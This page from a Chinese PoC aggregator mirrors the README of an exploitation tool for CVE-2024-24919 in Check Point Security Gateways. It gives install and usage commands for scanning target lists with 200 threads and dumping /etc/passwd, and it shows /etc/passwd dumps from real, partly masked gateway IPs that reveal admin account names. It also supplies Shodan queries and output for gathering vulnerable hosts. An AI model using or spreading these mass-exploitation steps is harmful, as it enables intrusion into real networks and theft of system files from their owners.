POC详情: faed61bc954f7a728ce98bf4da712175e3ac0bb4

来源
https://github.com/RevoltSecurities/CVE-2024-24919
关联漏洞
标题: Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
描述:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
描述
An Vulnerability detection and Exploitation tool for CVE-2024-24919
介绍
# CVE-2024-24919
An Vulnerability detection and Exploitation tool for CVE-2024-24919 

### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-24919
pip install -r requirements.txt
python3 exploit.py --help
```

### Usage:
```yaml
python3 exploit.py -h                                                  


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-24919

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or domain for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs for vulnerability detection
  -ftd FILE_TO_DUMP, --file-to-dump FILE_TO_DUMP
                        [INF]: Specify a file path to dump (default: /etc/passwd)
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:

```yaml
 python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

[Vulnerable]: https://207.232.4XX.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
wansup:x:0:0:Linux User,,,:/:/bin/clish

[Vulnerable]: https://81.218.166.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
ace:x:0:0:Linux User,,,:/:/bin/clish
joker:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

```

### Info:
Wanna scrape targets and test then install our Unique tool [ShodanX](https://github.com/Revoltsecurities/Shodanx) and get realtime data of shodan from you Terminal
to scrape targets install the Shodanx and Use the command:
```yaml
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt

      _                 _               __   __
     | |               | |              \ \ / /
 ___ | |__    ___    __| |  __ _  _ __   \ V / 
/ __|| '_ \  / _ \  / _` | / _` || '_ \   > <  
\__ \| | | || (_) || (_| || (_| || | | | / . \ 
|___/|_| |_| \___/  \__,_| \__,_||_| |_|/_/ \_\
                                               
                                               

    
                     Author : D.SanjaiKumar @CyberRevoltSecurities

[Version]:ShodanX current version v1.0.1 (latest)
[INFO]: Results Found for your query and facet: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 & facet:"ip"
[INFO]: 2.82.75.X
[INFO]: 5.102.XXX.XXX
[INFO]: 5.102.203.XXX
[INFO]: 5.102.210.XX
[INFO]: 5.102.211.23
[INFO]: 5.102.XXXX.127
[INFO]: 5.102.233.XXX
```

### About :

The tool is Developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and exploit the Vulnerability CVE-2024-24919 , The tool is only for education and ethical purpose only and 
Developers are not responsible for any illegal exploitations.
文件快照

 [4.0K]  /data/pocs/faed61bc954f7a728ce98bf4da712175e3ac0bb4
├── [7.0K]  exploit.py
├── [4.7K]  README.md
└── [ 107]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。